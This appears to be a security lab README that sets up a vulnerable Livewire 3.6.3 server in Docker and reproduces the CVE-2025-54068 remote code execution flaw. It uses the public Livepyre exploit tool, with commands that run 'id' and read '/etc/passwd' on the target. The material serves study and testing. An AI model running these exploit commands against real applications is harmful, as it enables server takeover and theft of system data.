# Livewire Component Property Hydration Remote Code Execution (CVE-2025-54068)

[中文版本(Chinese version)](README.zh-cn.md)

Livewire is a full-stack framework for Laravel that makes building dynamic interfaces simple, without leaving the comfort of Laravel.

A critical remote code execution vulnerability (CVE-2025-54068) exists in Livewire versions before 3.6.4. The vulnerability is caused by improper control of code generation during component property update hydration. When a Livewire component processes user input from the snapshot, the framework fails to properly sanitize object types, allowing attackers to inject malicious payloads that get executed on the server. If an attacker knows the `APP_KEY` of the Laravel application, the exploitation becomes even more straightforward.

References:

- <https://github.com/advisories/GHSA-29cq-5w36-x7w3>
- <https://github.com/synacktiv/Livepyre>

## Environment Setup

Execute the following command to start a Livewire 3.6.3 server:

```
docker compose up -d
```

After the server starts, a sample Todo List application will be available at `http://your-ip:8080/`.

## Vulnerability Reproduction

To reproduce the vulnerability, you can use the [Livepyre](https://github.com/synacktiv/Livepyre) exploit tool developed by @\_remsio\_ and @\_Worty. First, clone the repository and install the dependencies:

```bash
git clone https://github.com/synacktiv/Livepyre.git
cd Livepyre
pip install -r requirements.txt
```

Then run the exploit against the target. The tool will automatically detect the Livewire version, find available snapshots, and attempt to exploit the vulnerability without requiring the `APP_KEY`:

```bash
python Livepyre.py -u http://your-ip:8080/ -f system -p "id"
```

The tool will check for parameters with object types in the snapshot. If found, it will trigger RCE directly. Otherwise, it will attempt to bruteforce the parameters. You can also execute other commands, such as reading `/etc/passwd`:

```bash
python Livepyre.py -u http://your-ip:8080/ -f system -p "cat /etc/passwd"
```

![](1.png)
